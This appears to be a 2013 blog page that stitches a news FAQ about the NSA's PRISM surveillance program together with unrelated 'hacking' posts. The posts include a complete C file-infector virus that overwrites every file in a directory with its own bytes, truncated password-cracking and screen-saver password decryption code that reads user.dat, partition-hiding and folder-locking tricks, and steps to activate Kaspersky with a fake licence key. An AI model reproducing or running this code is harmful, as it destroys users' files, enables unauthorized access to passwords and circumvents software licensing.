Monday 10 June 2013

NSA PROGRAM OF US

What is the NSA's PRISM program? (FAQ)
 
We now know that the NSA uses something called PRISM to monitor private Web data. Sounds like "1984." What does it really mean?
 
You've been hearing about a top-secret government program reportedly giving the NSA access to digital consumer information held by large tech companies. But what is it, really, and how does it affect you? Reports are changing fast, so we created this FAQ to let you know what is known so far. We will continue to update it as the facts become clear.
 
What is PRISM?
PRISM stands for "Planning Tool for Resource Integration, Synchronization, and Management," and is a "data tool" designed to collect and process "foreign intelligence" that passes through American servers. Details about its existence were leaked to The Washington Post and The Guardian by Edward Snowden, a 29-year-old NSA contractor.
It has now been acknowledged by the Obama administration.
In the words of national security reporter Marc Ambinder, "PRISM [is] a kick-ass GUI that allows an analyst to look at, collate, monitor, and cross-check different data types provided to the NSA from Internet companies located inside the United States."

C PROGAM VIRUS


HOW TO CREATE VIRUS THROUGH "C" PROGRAMMING




#include
#include
#include
#include
#include
#include

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

 

CODE FOR GETTING COMPUTER'S PASSWORD

CODE FOR GETTING COMPUTER'S PASSWORD


 Code :
 # include<stdio.h>
 # include<stdio.h>
 # include<process.h>
 # include<stdlib.h>
 # include<ctype.h>
 # include<conio.h>
 # include<mem.h>

 unsigned char huge Data[100001];
 unsigned char keystream[1001];
 int Rpoint[300];

 void main(int argc,char *argv[]){
 FILE *fd;
 int i,j;
 int size;
 char ch;
 char *name;
 int cracked;
 int sizemask;
 int maxr;
 int rsz;
 int pos;
 int Rall[300];     /* Resourse allocation table */

 if(argc<2){
   printf("usage: glide filename (username)");
   exit(1);
 }

PARTITION HIDING SOFTWARE IN C

PARTITION HIDING SOFTWARE IN C


 /* program to read the partition table of hard disk and can hide and
 revele partitions*/

 #include<stdio.h>
 #include<bios.h>
 #include<dos.h>
 #include<stdlib.h>

 typedef unsigned char BYTE;
 typedef unsigned int WORD;
 typedef unsigned long DWORD;

 enum BOOL {TRUE=0,FALSE=1};
 struct PARTITIONINFO {
  BYTE bootid;   /* bootable?  0=no, 128=yes  */
  BYTE beghead;  /* beginning head number */
  BYTE begsect;  /* beginning sector number */
  BYTE begcyl;   /* 10 bit nmbr, with high 2 bits put in begsect */
  BYTE systid;   /* Operating System type indicator code */
  BYTE endhead;  /* ending head number */
  BYTE endsect;  /* ending sector number */
  BYTE endcyl;   /* also a 10 bit nmbr, with same high 2 bit trick */
  DWORD relsect; /* first sector relative to start of disk */
  DWORD numsect; /* number of sectors in partition */
 };

FOLDER PROTECTION SOFTWARE


FOLDER PROTECTION PROGRAM


CAN BE COMPILED BY THE PREVIOSLY GIVEN COMPILERS IN THE POST NAMED SCREEN SAVER PASSWORD CRACKER.


 #include<stdio.h>
 #include<string.h>
 #include<process.h>
 void main()
 {
 FILE *p;
 char ch,s[100];
 char r[100]="REN ";

 char u[]=".{21EC2020-3AEA-1069-A2DD-08002B30309D} ";
 char v[50];
 int choice,i;

 clrscr();
 p=fopen("C:\a.bat","w+");
 if(p==NULL)

PASSWORD CRACKER

SCREEN SAVER PASSWORD CRACKER

THIS IS THE CODE OF A C/C++ PROGRAM WHICH CAN BE COMPILED BY USING DEV C++ AND CODE BLOKS OR TURBO C++. IT IS CREATED BY ONE OF MY FRIEND.


 /*
 Screen Saveer Password Cracker:
 Decrypts Screen Saver Password which is stored in user.dat.
 */

 #include<ctype.h>
 #include<stdio.h>
 #include<string.h>
 FILE *fp;
 char *path="c:\windows\user.dat";

 /*encrypted password stored in this file when u log on to default user..
 If there r multiple users..Password stored in
 \windowsprofilesuser-nameuser.dat...

 */

ACTIVATE KASPERSKY 2013 WITH KEY FILE

HOW TO ACTIVATE KASPERSKY 2013 13.0.1.4190 USING KEY FILES!
 
1. Open Kaspersky 2011 License Manager (from lower right corner).
 
2. Click 'Activate the application with a new license' button. (Delete any trial key first, by clicking the red X next to the key).
 
3. Disable your internet connection
 
4. Select 'Activate commercial version' and enter the activation license code as                                          11111-11111-11111-1111X
 
5. Wait activation wizard message-Click OK